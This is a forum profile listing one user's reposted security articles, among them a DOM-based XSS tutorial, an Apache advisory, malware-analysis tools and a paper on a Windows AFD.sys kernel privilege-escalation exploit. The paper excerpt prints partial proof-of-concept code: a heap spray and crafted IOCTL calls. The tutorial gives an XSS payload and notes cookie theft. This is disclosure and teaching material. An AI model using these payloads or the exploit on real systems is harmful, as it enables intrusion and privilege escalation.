-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Debugging a weird network problem (or: IPv6 privacy addresses, just say no) All you folks who followed my blog for food porn are going to want to skip this one. The past ten days have been pretty horrible for me at work, thanks to the combined effect of five different network issues. One particularly difficult one to track down has been affecting the very access switch that serves my own office, and that makes it particularly frustrating (especially when trying to fight other fires). The particular symptom that we observed was that traffic would slow down for a short period — about 15 seconds, just long enough to notice but not long enough to actually track down the source of the problem. It was clear from looking at interface statistics that there was some sort of broadcast or multicast storm going on. Early on, one particular network drop looked suspicious: when the slowdown occurred, we could see that the switch port was receiving a high rate of traffic (hundreds or even thousands of packets per second) and that these were being replicated to all or nearly all the other ports on that switch. When other switches started to trigger the same sort of alerts in our monitoring system, I physically unplugged that drop and things appeared to get better — but I still had no idea why. And things only appeared to get better: there were still slowdowns; they just weren’t as severe (and thus as noticeable) as before. The access layer in our network is composed of Juniper EX4200 switches, and thanks to Junos’s FreeBSD heritage, they have much better observability than most other switches. In particular, you can run start shell from the Junos command line and get a standard Unix shell (well, csh actually, which while non-standard is “standard enough” for most usual administrative tasks). There are some limitations: Juniper’s kernel will only execute signed binaries, for example, so you can’t install your own software on the switches (although Juniper offers an SDK for some platforms). But Junos includes a number of standard FreeBSD utilities, including netstat, tar, and (relevant for this discussion) top. So I was able to log in to the problem switch and monitor exactly what was going on CPU-wise. Here’s what a normal EX4200 looks like: last pid: 26547; load averages: 0.08, 0.12, 0.14 up 110+05:09:57 22:16:09 48 processes: 1 running, 47 sleeping CPU states: 5.1% user, 0.0% nice, 4.6% system, 0.2% interrupt, 90.0% idle Mem: 390M Active, 67M Inact, 47M Wired, 190M Cache, 110M Buf, 286M Free Swap: PID USERNAME THR PRI NICE SIZE RES STATE TIME WCPU COMMAND 1374 root 2 44 -52 72584K 19100K select 237.3H 3.66% sfid 1376 root 1 8 0 86884K 33716K nanslp 129.9H 1.12% pfem 1373 root 1 4 0 68052K 11804K kqread 53.9H 0.00% chassism 1424 root 1 4 0 10204K 6084K kqread 30.9H 0.00% mcsnoopd 1393 root 1 4 0 23896K 15808K kqread 560:19 0.00% eswd 1402 root 1 96 0 28968K 14992K select 420:57 0.00% mib2d 1422 root 1 4 0 17320K 9716K kqread 273:08 0.00% lldpd 1375 root 1 4 -20 14240K 8588K kqread 240:56 0.00% vccpd 1401 root 1 96 0 22184K 16388K select 215:18 0.00% snmpd 1426 root 1 96 0 12356K 6940K select 163:18 0.00% license-ch This is just a standard FreeBSD top command, from about the 7.0 era, so it accepts the S and H flags to show system processes and threads, respectively, but in this case that didn’t add any useful information. When things were hosed, yes, there was a process (mcsnoopd, the multicast snooping daemon) that was taking up a lot of CPU, but it was only getting 30% of the processor — the other 60% was being absorbed by “system” time and not attributable to any particular process or thread. Seeing this, but being frustratingly unable to truly identify the source of the problem, I opened a JTAC case. The technician gave me a script to run, which totally failed to identify the problem. (JTAC’s debugging scripts are apparently spread around cargo-cult fashion, and the JTAC staff don’t actually understand what they do or have any idea how to debug them — in this case, the script I was given would never have found this issue because it was looking at the wrong place in the output of top -b — but it was impossible to explain this to the tech over email. The script itself was clearly a horrible hacked-together farrago of awk (twice) and grep and sed (twice) to do something which could have been easily done in a single line of awk script by someone who was actually competent.) Eventually we had a phone call and for once the Juniper “secure meeting” functionality worked. (I keep an old Thinkpad running Windows in my office for this purpose, since “secure meeting” doesn’t usually work on any other platform.) I was able to convince the tech (after two days of waiting for this script to find something) that it wasn’t going to work, and he moved on to another debugging step — one that should have occurred to me, but when you’re under stress you often don’t think of the obvious. One of the other FreeBSD tools that Junos includes is tcpdump (there’s even an interface to it in the Junos command line), so you can actually take a packet capture directly on the switch, save it to the switch’s internal flash, and then scp it somewhere else for analysis. The one drawback with this is that it can only see the packets that hit the switch’s CPU — anything that’s switched in hardware doesn’t get seen by BPF — but that’s actually an advantage when you’re trying to identify something that’s clobbering the switch’s CPU. We took a packet capture, and I uploaded it to JTAC so the tech could look at it while I was still on the phone, but there wasn’t anything that looked like it could possibly be the source of the problem. So we ended the call with the conclusion that I would continue to watch the switch and take a packet capture when the problem was actually happening. It didn’t take long — as it turned out, the problem condition was actually quite deterministic, and repeated every 125 seconds! So I had no trouble getting those captures, and after uploading them to JTAC I opened each one up in Wireshark and had a look for myself. What immediately caught my attention was a long stream of IPv6 multicasts that overwhelmed all other traffic for about ten seconds — suspiciously similar to the 15-second period of the slowdown I had been watching in top. I saw that these were all IPv6 Multicast Listener Discovery packets, which are part of the ICMPv6 protocol and take the place of the IPv4 IGMP protocol — they are used by routers to identify which hosts are members of which multicast groups, so that only desired multicast traffic is forwarded down a network interface. I could see that the burst of multicasts was immediately preceded by an all-groups solicitation coming from one of our core switches, so that all seemed normal, and the solicitation itself actually said “please splay your responses over the next 10,000 milliseconds”, which explained why the burst lasted for almost exactly that length of time. The multicast groups being reported, in nearly all cases, were the so-called “solicited node” multicast groups, which are part of IPv6?s (mandatory) Neighbor Discovery Protocol — the way nodes on a network find out their neighbors’ layer-2 addresses, analogous to ARP in IPv4. If this was just normal behavior, why exactly was it causing such problems? Surely Juniper had plenty of customers who were using IPv6 in production networks, so they must have tested this software. And why was the mcsnoopd process involved for IPv6 traffic? I started reading up on tuning parameters for MLD, reasoning that maybe the defaults were just wrong for a network of our size. We had done a software update on all of our access switches during the spring. One of the new features added in Junos 12.1 (to which we had upgraded) was support for “MLD snooping”. This was the IPv6 analogue to “IGMP snooping”, which we did have configured. (In IGMP snooping, a layer-2 switch like ours listens to the layer-3 IGMP traffic, and even forges its own IGMP messages to make them look like they came from a router, to determine on a port-by-port basis which multicast groups are subscribed. Otherwise, it would have to flood all multicasts to all ports, which would take far more bandwidth and more interconnect resources on the switch, so even though it’s a “layering violation”, it’s a necessity in all but the smallest networks. MLD snooping does exactly the same thing, but for IPv6.) I thought that maybe not having MLD snooping configured was causing some sort of problem — perhaps the mcsnoopd process was taking an abnormal amount of CPU when faced with MLD packets that it didn’t know what to do with, or perhaps (since MLD packets themselves are also multicast) it was just doing the flooding in software rather than allowing the switch hardware to do it. In any event, I turned on MLD snooping for all VLANs on the switch, and the CPU spikes simply stopped. Coincidence? I’ll wait and see — but since more and more machines have IPv6 on by default, I’ll be deploying MLD snooping everywhere I can (regardless of whether it really helps my issue or not). So I went home, and made dinner (well, actually, a bowl of macaroni and cheese). But I was still thinking about this issue at work. The JTAC technician sent me email, after I had left work, pointing to an issue on some HP machines running Windows with a bad NIC driver. We don’t have many HP machines, so I initially dismissed the idea, but since I could run Wireshark just as easily at home as in the office, I scp’ed the trace files from my workstation and had a look. Opening up one of the traces in Wireshark, I used Statistics => Endpoint list => Ethernet to find which Ethernet addresses had sent the most traffic, and one jumped out at me immediately: a Dell machine on my network had sent the second-most number of multicast or broadcast packets in this several-minute capture. It was second only to the core switch that was busily ARPing away for non-existent IPv4 addresses. (We have a lot of address space, and it’s all on the public Internet, so we get scanned pretty much continually.) I logged in to the switch, and located the port where it connected, and lo and behold, it was on the same port as I had originally suspected! I used Wireshark’s filtering capability to get an idea of what the machine was, and what exactly it was doing sending all of those packets. That told me the identity of the machine — it was a Windows machine, and Windows loves to broadcast its identity to all and sundry — and more to the point, I saw that it was responsible for the vast majority of those multicast memberships: 350 different multicast groups in all, nearly all of which were “solicited node” groups for different IPv6 “privacy” addresses. Now for a digression on IPv6 addressing. An IPv6 address is 128 bits long. That is enough addresses to give billions of addresses to every cell in the body of every human on earth. Of course, there’s no reason you’d do that, and a lot of the address space is “wasted” by giving it a structure that makes it practical to actually route IPv6 packets on a global scale. By convention, the top 64 bits of an IPv6 address identifies a specific network, and the bottom 64 bits are an “interface identifier”, which identifies the particular device attached to that network. Some bright light looked at this and said, oh, gee, all those users are used to dialup in the IPv4 Internet where they get a different address every time they turn their computer on, so we’d better find a way to emulate that in IPv6. Unfortunately, they did, and thus “privacy” addresses were born — where the device identifier (technically called an “interface ID” since it’s usually specific to the NIC) is just randomly generated, and changes every so often. That way, nobody will ever have to worry about some bad guy on the IPv6 Internet identifying them by their MAC address. (Duh, they’ll just use the “network” part of the IPv6 address instead!) Of course that will also ensure that nobody will ever have to care about making the IPv6 reverse DNS work properly, either, since nobody will use the same address from one day to the next. Microsoft turned this “feature” on by default in recent versions of Windows. (Apple turned it on in Mac OS and iOS as well, but that’s a rant for another day.) Apparently the Windows implementation is more aggressive, or Windows applications are more likely to hold connections open, because there are lots of reports of Windows machines having hundreds of these “privacy” addresses simultaneously — and that’s what appears to be happening on our problem machine: every time the router sent out a “please tell me all your memberships in the next 10 seconds” message, the Windows box would reply with 30 MLD responses a second for ten seconds. That doesn’t seem like much, but now that I’ve started turning MLD snooping on, I can see that there are other VLANs in my network that look like they are having the same problem — so I have my work cut out for me. Luckily, there’s a really simple set of commands to completely disable “privacy” addresses on Windows machines (for whatever reason, Microsoft doesn’t provide a GUI for this), so now that I know what to look for, I can identify the problem machines and get their owners to fix them. Still, grrr. Sursa: Debugging a weird network problem (or: IPv6 privacy addresses, just say no) | Occasionally Coherent
-
How Russian Hackers Stole the Nasdaq By Michael Riley July 17, 2014 In October 2010, a Federal Bureau of Investigation system monitoring U.S. Internet traffic picked up an alert. The signal was coming from Nasdaq (NDAQ). It looked like malware had snuck into the company’s central servers. There were indications that the intruder was not a kid somewhere, but the intelligence agency of another country. More troubling still: When the U.S. experts got a better look at the malware, they realized it was attack code, designed to cause damage. As much as hacking has become a daily irritant, much more of it crosses watch-center monitors out of sight from the public. The Chinese, the French, the Israelis—and many less well known or understood players—all hack in one way or another. They steal missile plans, chemical formulas, power-plant pipeline schematics, and economic data. That’s espionage; attack code is a military strike. There are only a few recorded deployments, the most famous being the Stuxnet worm. Widely believed to be a joint project of the U.S. and Israel, Stuxnet temporarily disabled Iran’s uranium-processing facility at Natanz in 2010. It switched off safety mechanisms, causing the centrifuges at the heart of a refinery to spin out of control. Two years later, Iran destroyed two-thirds of Saudi Aramco’s computer network with a relatively unsophisticated but fast-spreading “wiper” virus. One veteran U.S. official says that when it came to a digital weapon planted in a critical system inside the U.S., he’s seen it only once—in Nasdaq. The October alert prompted the involvement of the National Security Agency, and just into 2011, the NSA concluded there was a significant danger. A crisis action team convened via secure videoconference in a briefing room in an 11-story office building in the Washington suburbs. Besides a fondue restaurant and a CrossFit gym, the building is home to the National Cybersecurity and Communications Integration Center (NCCIC), whose mission is to spot and coordinate the government’s response to digital attacks on the U.S. They reviewed the FBI data and additional information from the NSA, and quickly concluded they needed to escalate. Thus began a frenzied five-month investigation that would test the cyber-response capabilities of the U.S. and directly involve the president. Intelligence and law enforcement agencies, under pressure to decipher a complex hack, struggled to provide an even moderately clear picture to policymakers. After months of work, there were still basic disagreements in different parts of government over who was behind the incident and why. “We’ve seen a nation-state gain access to at least one of our stock exchanges, I’ll put it that way, and it’s not crystal clear what their final objective is,” says House Intelligence Committee Chairman Mike Rogers, a Republican from Michigan, who agreed to talk about the incident only in general terms because the details remain classified. “The bad news of that equation is, I’m not sure you will really know until that final trigger is pulled. And you never want to get to that.” Bloomberg Businessweek spent several months interviewing more than two dozen people about the Nasdaq attack and its aftermath, which has never been fully reported. Nine of those people were directly involved in the investigation and national security deliberations; none were authorized to speak on the record. “The investigation into the Nasdaq intrusion is an ongoing matter,” says FBI New York Assistant Director in Charge George Venizelos. “Like all cyber cases, it’s complex and involves evidence and facts that evolve over time.” While the hack was successfully disrupted, it revealed how vulnerable financial exchanges—as well as banks, chemical refineries, water plants, and electric utilities—are to digital assault. One official who experienced the event firsthand says he thought the attack would change everything, that it would force the U.S. to get serious about preparing for a new era of conflict by computer. He was wrong. On the call at the NCCIC were experts from the Defense, Treasury, and Homeland Security departments and from the NSA and FBI. The initial assessment provided the incident team with a few sketchy details about the hackers’ identity, yet it only took them minutes to agree that the incursion was so serious that the White House should be informed. The conference call participants reconvened at the White House the next day, joined by officials from the Justice and State departments and the Central Intelligence Agency. The group drew up a set of options to be presented to senior national security officials from the White House, the Justice Department, the Pentagon, and others. Those officials determined the questions that investigators would have to answer: Were the hackers able to access and manipulate or destabilize the trading platform? Was the incursion part of a broader attack on the U.S. financial infrastructure? The U.S. Secret Service pushed to be the lead investigative agency. Its representatives noted that they had already gone to Nasdaq months earlier with evidence that a group of alleged Russian cybercriminals, led by a St. Petersburg man named Aleksandr Kalinin, had hacked the company and that the two events might be related. The Secret Service lost the argument and sat the investigation out. Sursa: How Russian Hackers Stole the Nasdaq - Businessweek
-
DOM Based Cross-site Scripting Vulnerability Tue, 15 Jul 2014, by Ferruh Mavituna Today Cross-site Scripting (XSS) is a well known web application vulnerability among developers, so there is no need to explain what XSS is. The most important part of a Cross-site Scripting attack developers should understand is its impact; an attacker can steal or hijack your session, carry out very successful phishing attacks and effectively can do anything that the victim can. DOM Based XSS simply means a Cross-site scripting vulnerability that appears in the DOM (Document Object Model) instead of part of the HTML. In reflective and stored Cross-site scripting attacks you can see the vulnerability payload in the response page but in DOM based cross-site scripting, the HTML source code and response of the attack will be exactly the same, i.e. the payload cannot be found in the response. It can only be observed on runtime or by investigating the DOM of the page. Simple DOM Based Cross-site Scripting Vulnerability Example Imagine the following page http://www.example.com/test.html contains the below code: <script> document.write("<b>Current URL<b> : " + document.baseURI); </script> If you send an HTTP request like this http://www.example.com/test.html#<script>alert(1)</script>, simple enough your JavaScript code will get executed, because the page is writing whatever you typed in the URL to the page with document.write function. If you look at the source of the page, you won’t see <script>alert(1)</script> because it’s all happening in the DOM and done by the executed JavaScript code. After the malicious code is executed by page, you can simply exploit this DOM based cross-site scripting vulnerability to steal the cookies of the user or change the page’s behaviour as you like. DOM XSS Vulnerability is a Real Threat Various research and studies identified that up to 50% of websites are vulnerable to DOM Based XSS vulnerability. Security researchers have already identified DOM Based XSS issues in high profile internet companies such as Google, Yahoo and Alexa. Server Side Filters Do Not Matter One of the biggest differences between DOM Based XSS and Reflected or Stored XSS vulnerabilities is that DOM Based XSS cannot be stopped by server-side filters. The reason is quite simple; anything written after the "#" (hash) will never be sent to the server. Historically, fragment identified a.k.a. hash introduced to simply scroll the HTML page to a certain element however later on it was adopted by JavaScript developers to be used in AJAX pages to keep track of the pages and various other things, mostly referred as hash-bang "#!". Due to this design anything after hash won’t be sent to the server. This means all server-side protection in the code will not work for DOM Based XSS vulnerabilities. As a matter of fact, any other type of web protections such as web application firewalls, or generic framework protections like ASP.NET Request Validation will not protect you against DOM Based XSS attacks. Input & Output so called Source & Sink The logic behind the DOM XSS is that an input from the user (source) goes to an execution point (sink). In the previous example our source was document.baseURI and the sink was document.write. What you need to understand though is that DOM XSS will appear when a source that can be controlled by the user is used in a dangerous sink. So when you see this either you need to do the necessary code changes to avoid being vulnerable to DOM XSS or you need to add encoding accordingly. Below is a list of sources and sinks which are typically targeted in DOM XSS attacks. Note that this is not a complete list but you can figure out the pattern, anything that can be controlled by an attacker in a source and anything that can lead to script execution in a sink. Popular Sources document.URL document.documentURI location.href location.search location.* window.name document.referrer Popular Sinks HTML Modification sinks document.write (element).innerHTML [*]HTML modification to behaviour change (element).src (in certain elements) [*]Execution Related sinks eval setTimout / setInterval execScript Fixing DOM Cross-site Scripting Vulnerabilities The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example if you want to use user input to write in a <div> element don’t use innerHtml, instead use innerText/textContent. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerbilities. It is always a bad idea to use a user-controlled input in dangerous sources such as eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don’t do it instead of trying to sanitize the input. Finally, to fix the problem in our initial code, instead of trying to encode the output correctly which is a hassle and can easily go wrong we would simply use element.textContent to write it in a content like this: <b>Current URL:</b> <span id="contentholder"></span> <script> document.getElementById("contentholder").textContent = document.baseURI; </script> It does the same thing but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities. Sursa: https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/
-
Win32 and Win64 ShellcodesIntroduction 'Hidden' is a 32-bit shell code written for Windows that uses RSA key exchange and robust encryption to hide data transmitted between 2 computers. It consists of a client (the shell code) and a server. The client will create a cmd.exe process which then accepts data sent to it by the server over encrypted channel. Tested on 32-bit version of Windows XP, 64-bit 7 and Server 2012 PDF: https://github.com/cmpxchg8/shellcode/blob/master/win32/hs/Hidden%20Shellcode%20for%20Windows.pdf?raw=true Sursa: https://github.com/cmpxchg8/shellcode (win32/hs)
-
[h=1]FakeNet – Windows Network Simulation Tool For Malware Analysis[/h] FakeNet is a Windows Network Simulation Tool that aids in the dynamic analysis of malicious software. The tool simulates a network so that malware interacting with a remote host continues to run allowing the analyst to observe the malware’s network activity from within a safe environment. [adsnse size=1] The goal of the project is to: Be easy to install and use; the tool runs on Windows and requires no 3rd party libraries Support the most common protocols used by malware Perform all activity on the local machine to avoid the need for a second virtual machine Provide python extensions for adding new or custom protocols Keep the malware running so that you can observe as much of its functionality as possible Have a flexible configuration, but no required configuration The tool is in its infancy of development. The team started working on the tool in January 2012 and intend to maintain the tool and add new and useful features. If you find a bug or have a cool feature you think would improve the tool please do contact them. Features Supports DNS, HTTP, and SSL HTTP server always serves a file and tries to serve a meaningful file; if the malware request a .jpg then a properly formatted .jpg is served, etc. The files being served are user configurable. Ability to redirect all traffic to the localhost, including traffic destined for a hard-coded IP address. Python extensions, including a sample extension that implements SMTP and SMTP over SSL. Built in ability to create a capture file (.pcap) for packets on localhost. Dummy listener that will listen for traffic on any port, auto-detect and decrypt SSL traffic and display the content to the console. Right now the tool only supports WinXP Service Pack 3. The tool runs fine on Windows Vista/7 although certain features will be automatically disabled. You can download FakeNet here: Fakenet1.0c.zip Or read more here. Sursa: http://www.digitalmunition.net/?p=2984
-
[h=1]IDA Dalvik debugger: tips and tricks[/h] Posted on July 11, 2014 by Nikolay Logvinov One of the new features of IDA 6.6 is the Dalvik debugger, which allows us to debug Dalvik binaries on the bytecode level. Let us see how it can help when analysing Dalvik files. [h=2]Encoded strings[/h] Let us consider the package with the encrypted strings: STRINGS:0001F143 unk_1F143:.byte 0x30 # 0 # DATA XREF: STR_IDS:off_70 STRINGS:0001F144 aFda8sohchnidgh: .string "FDA8sOhCHNidghM2hzFxMXUsivl2k7hFOhkJrW7O2ml8qLVM",0 STRINGS:0001F144 # DATA XREF: q_b@V STRINGS:0001F144 # String #277 (0x115) STRINGS:0001F175 unk_1F175:.byte 0x3C # < # DATA XREF: STR_IDS:off_70 STRINGS:0001F176 aCgv01n8li2s3ok: .string "CGv01N8li2s3OKN29j6exe6-rvzgIRaCcWoOt5y30zjP1k43-f7WVOtXjbg=" STRINGS:0001F176 # DATA XREF: q_b@V+C There is a data reference, let us see where this string is used (e.g. using Ctrl-X). CODE:000090C0 const-string v0, aFda8sohchnidgh # "FDA8sOhCH"... CODE:000090C4 invoke-static {v0}, <ref RC4.decryptBase64(ref) RC4_decryptBase64@LL> CODE:000090CA move-result-object v0 So, apparently the strings are encrypted with RC4+Base64. Let us set a breakpoint after the RC4.decryptBase64() call and start the debugger. After hitting the breakpoint, open the “Locals” debugger window. Even if the application was stripped of debug information, IDA makes the best effort to show function’s input arguments and return value. Note the local variable named retval. It is a synthetic variable created IDA to show the function return value. This is how we managed to decode the string contents. [h=3]How to debug Dalvik and ARM code together[/h] Let us have a look at application that uses a native library. On a button press, the function stringFromJNI() implemented in the native library is called. package ida.debug.hellojni; public class MainActivity extends Activity { public native String stringFromJNI(); static { System.loadLibrary("hello-jni"); } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); final TextView tv = new TextView(this); final Button btn = new Button(this); btn.setText("Press me to call the native code"); btn.setOnClickListener(new Button.OnClickListener() { public void onClick(View v) { tv.setText(stringFromJNI()); } }); LinearLayout layout = new LinearLayout(this); layout.setOrientation(LinearLayout.VERTICAL); layout.setLayoutParams(new LayoutParams( LayoutParams.FILL_PARENT, LayoutParams.FILL_PARENT)); layout.addView(btn); layout.addView(tv); setContentView(layout); } } Native library function returns a well-known string. jstring Java_ida_debug_hellojni_MainActivity_stringFromJNI( JNIEnv* env, jobject thiz) { return (*env)->NewStringUTF(env, "Hello, JNI world!"); } o, we have application packaged in hellojni.apk file and installed in Android Emulator. Because IDA cannot analyse or debug both Dalvik and native (ARM) code at the same time, we’ll need to use two IDA instances to perform debugging in turns. To prepare the first IDA instance: load hellojni.apk into IDA, select classes.dex to analyze. go to the native function call and set breakpoint there. CODE:0000051C iget-object v0, this, MainActivity$1_val$tv CODE:00000520 iget-object v1, this, MainActivity$1_this$0 CODE:00000524 invoke-virtual {v1}, <ref MainActivity.stringFromJNI() imp. @ _def_MainActivity_stringFromJNI@L> CODE:0000052A move-result-object v1 change the default port in “Debugger/Process options” to any other value. start the Dalvik debugger and wait until breakpoint is hit. Then prepare the second IDA instance: prepare to debug native ARM Android application (copy and start android_server and so on). load hellojni.apk into IDA, and now select lib/armeabi-v7a/libhello-jni.so to analyze. the name of the native function was formed by special rules and in our case it is Java_ida_debug_hellojni_MainActivity_stringFromJNI(), so go to to it and set a breakpoint: .text:00000BC4 EXPORT Java_ida_debug_hellojni_MainActivity_stringFromJNI .text:00000BC4 Java_ida_debug_hellojni_MainActivity_stringFromJNI .text:00000BC4 .text:00000BC4 var_C = -0xC .text:00000BC4 var_8 = -8 .text:00000BC4 .text:00000BC4 STMFD SP!, {R11,LR} .text:00000BC8 ADD R11, SP, #4 .text:00000BCC SUB SP, SP, #8 .text:00000BD0 STR R0, [R11,#var_8] .text:00000BD4 STR R1, [R11,#var_C] .text:00000BD8 LDR R3, [R11,#var_8] .text:00000BDC LDR R3, [R3] .text:00000BE0 LDR R2, [R3,#0x29C] .text:00000BE4 LDR R0, [R11,#var_8] .text:00000BE8 LDR R3, =(aHelloJniWorld - 0xBF4) .text:00000BEC ADD R3, PC, R3 ; "Hello, JNI world!" .text:00000BF0 MOV R1, R3 .text:00000BF4 BLX R2 .text:00000BF8 MOV R3, R0 .text:00000BFC MOV R0, R3 .text:00000C00 SUB SP, R11, #4 .text:00000C04 LDMFD SP!, {R11,PC} .text:00000C04 ; End of function Java_ida_debug_hellojni_MainActivity_stringFromJNI select “Remote ARM Linux/Android debugger” and attach to the application process. press F9 to continue. Now switch to the first IDA session and press, for example, F8 to call native function. If we return back to the second IDA session then we can notice the breakpoint event. Now we can continue to debug the native code. When we finish, press F9 and return to the first IDA session. The full source code of the example you can download from our site. Sursa: IDA Dalvik debugger: tips and tricks | Hex Blog
-
Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability ZDI-14-236: July 16th, 2014 CVE ID CVE-2014-0226 CVSS Score 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) Affected Vendors Apache Affected Products HTTPD Server 2.x Vulnerability Details This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache HTTPD server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution. Vendor Response Apache has issued an update to correct this vulnerability. More details can be found at: svn commit: r1610499 - in /httpd/httpd/branches/2.4.x: ./ CHANGES include/ap_mmn.h include/scoreboard.h modules/generators/mod_status.c modules/lua/lua_request.c server/scoreboard.c Disclosure Timeline 2014-05-30 - Vulnerability reported to vendor 2014-07-16 - Coordinated public release of advisory Credit This vulnerability was discovered by: AKAT-1 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Marek Kroemeke Sursa: Zero Day Initiative
-
[h=1]Access OS X's Secret Terminal Hidden in the Login Screen[/h] Thorin Klosowski If you ever need to enter console commands without logging all the way into the desktop, Macworld has an old tip that shows you how to get access to the Terminal without going through the whole login process. All you need to do is type >console into the username field of the login screen, and you'll get dumped into a Terminal screen. Here, you can run pretty much any commands you need without logging all the way into the desktop. You still need a login and password to do anything, but it's a nice way to get quick access to your computer. This should work in pretty much all modern versions of OS X.1 Sursa: Access OS X's Secret Terminal Hidden in the Login Screen
-
New IP-based wireless networking protocol created Recognizing the need for a better way to connect products in the home, seven companies announced that they’ve joined forces to develop Thread, a new IP-based wireless networking protocol. Thread Group founding members consist of industry-leading companies including Yale Security, Silicon Labs, Samsung Electronics, Nest Labs, Freescale Semiconductor, Big Ass Fans and ARM. While currently available 802.15.4 networking technologies have their own advantages, each also has critical issues that prevent the promise of the Internet of Things (IoT) from being realized. These include lack of interoperability, inability to carry IPv6 communications, high power requirements that drain batteries quickly, and “hub and spoke” models dependent on one device (if that device fails, the whole network goes down). With Thread, product developers and consumers can securely connect more than 250 devices into a low-power, wireless mesh network that also includes direct Internet and cloud access for every device. “Existing wireless networking approaches were introduced long before the Internet of Things gained ground,” said Vint Cerf, vice president and chief Internet evangelist, Google, and advisor to the Thread Group. “The Thread protocol takes existing technologies and combines the best parts of each to provide a better way to connect products in the home.” “A number of networking solutions and platforms have been introduced to address the growing demand for connected products in the home,” said Lisa Arrowsmith, associate director, connectivity, smart homes and smart cities, IHS Technology. “Built on well-proven standards, including IEEE 802.15.4, IETF IPv6 and 6LoWPAN, Thread represents a resilient, IP-based solution for the rapidly growing Internet of Things.” Unlike many existing technologies or IoT approaches, Thread is not an application protocol or a connectivity platform for many types of disparate networks. Thread is an IPv6 networking protocol built on open standards, designed for low-power 802.15.4 mesh networks. Existing popular application protocols and IoT platforms can run over Thread networks. A version of Thread is already being used successfully in Nest products today. Thread offers product developers technological advantages over existing wireless standards: Reliable networks: Thread offers robust self-healing mesh networks that scale to hundreds of devices with no single point of failure. Devices are ready when people need them. Secure networks: Thread networks feature secure, banking-class encryption. Thread closes identified security holes found in other wireless protocols and provides worry-free operation. Simple connectivity: Thread devices are simple to install with a smartphone, tablet or computer. Consumers can securely connect Thread devices in the home to each other and to the cloud for easy control and access from anywhere. Low power: Thread supports battery-operated devices as part of a home network. This allows the devices that people use every day – including thermostats, lighting controls, safety and security products – to be a part of the network without requiring constant charging or frequent battery changes. Millions of existing 802.15.4 wireless devices already on the market can run Thread with just a software enhancement -- no new hardware required. Thread is designed for quick implementation and deployment of devices throughout the home. Sursa: New IP-based wireless networking protocol created
-
AFD.SYS DANGLING POINTER VULNERABILITY TABLE OF CONTENTS Affected OS ......................................................................................................................................................................... 2 Overview ............................................................................................................................................................................. 2 Impact ................................................................................................................................................................................. 2 Technical Analysis ............................................................................................................................................................... 3 POC code ......................................................................................................................................................................... 3 Vulnerability Analysis ...................................................................................................................................................... 4 Step 1 - IOCTL 0x1207f ................................................................................................................................................ 5 Step 2 - IOCTL 0x120c3 ............................................................................................................................................... 8 Exploitation ..................................................................................................................................................................... 9 READ-/WRITE-Primitives through WorkerFactory Objects ....................................................................................... 10 Controlled Data on NonPagedPoolNx Pool ............................................................................................................... 11 Leak Target ............................................................................................................................................................... 12 Single-Gadget-ROP for SMEP Evasion ....................................................................................................................... 12 Shellcode ................................................................................................................................................................... 13 Putting it all together ................................................................................................................................................ 13 Patch Analysis ................................................................................................................................................................... 14 […]targetsize = 0x100 virtaddress = 0x13371337 mdlsize = (pow(2, 0x0c) * (targetsize - 0x30) / 8) - 0xfff - (virtaddress & 0xfff) IOCALL = windll.ntdll.ZwDeviceIoControlFile def I(val): return pack("<I", val) inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsize) + I(0)*2 + I(1) + I(0) inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4 […] print "[+] creating socket..." sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, [1] socket.IPPROTO_TCP, None, 0, 0) if sock == -1: print "[-] no luck creating socket!" sys.exit(1) print "[+] got sock 0x%x" % sock addr = sockaddr_in() addr.sin_family = socket.AF_INET addr.sin_port = socket.htons(135) addr.sin_addr = socket.htonl(0x7f000001) connect(sock, byref(addr), sizeof(addr)) [2] print "[+] sock connected." print "[+] fill kernel heap" rgnarr = [] nBottomRect = 0x2aaaaaa while(1): hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1) [3] if hrgn == 0: break rgnarr.append(hrgn) print ".", print "\n[+] GO!" IOCALL(sock,None,None,None,byref(IoStatusBlock), [4] 0x1207f, inbuf1, 0x30, "whatever", 0x0) IOCALL(sock,None,None,None,byref(IoStatusBlock), [5] 0x120c3, inbuf2, 0x18, "whatever", 0x0) print "[+] after second IOCTL! this should not be hit!" Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
-
[h=1]armbot[/h] armbot is an irc bot written in armv6-linux-gnueabi assembler. [h=1]features[/h] connect to a non-ssl irc server ping/pong join a channel respond to "armbot: source" [h=1]motivation[/h] lol [h=1]requirements to run on x86_64[/h] qemu-arm as/ld with armv6 target (optional) gdb with armv6 target for debugging It may be necessary to change the XPREFIX variable in the Makefile to match the local cross-compilation binaries. Sursa: https://github.com/wyc/armbot#armbot
-
Ce date transmit despre tine programele antivirus ?
Nytro replied to -Immortal-'s topic in Stiri securitate
Se poate afla. Trebuie doar facut research. Si un driver. Si un bypass la protectiile lor de self-defense. -
Thanks. ComputerWorld: Emergency vBulletin patch fixes SQL injection vulnerability - Computerworld
-
[h=1]Hacker Way: Rethinking Web App Development at Facebook[/h] Delivering reliable, high-performance web experiences at Facebook's scale has required us to challenge some long-held assumptions about software development. Join us to learn how we abandoned the traditional MVC paradigm in favor of a more functional application architecture.
-
Da. Peste cateva zile. Sa aiba lumea timp sa isi faca lumea update.
-
Ia da-i un alert(document.cookie) si vezi daca ai cookie-urile cu numele Y si T.
-
Acel vector XSS poate ajunge si la un alt user de pe Messenger? E Remote sau doar Self? Mai fusese postat unul. E in Send SMS?
-
Din aproape orice punct de vedere KDE > Gnome. Parerea mea. Bine Gnome e mai stabil, unele aplicatii KDE mai crapa urat.
-
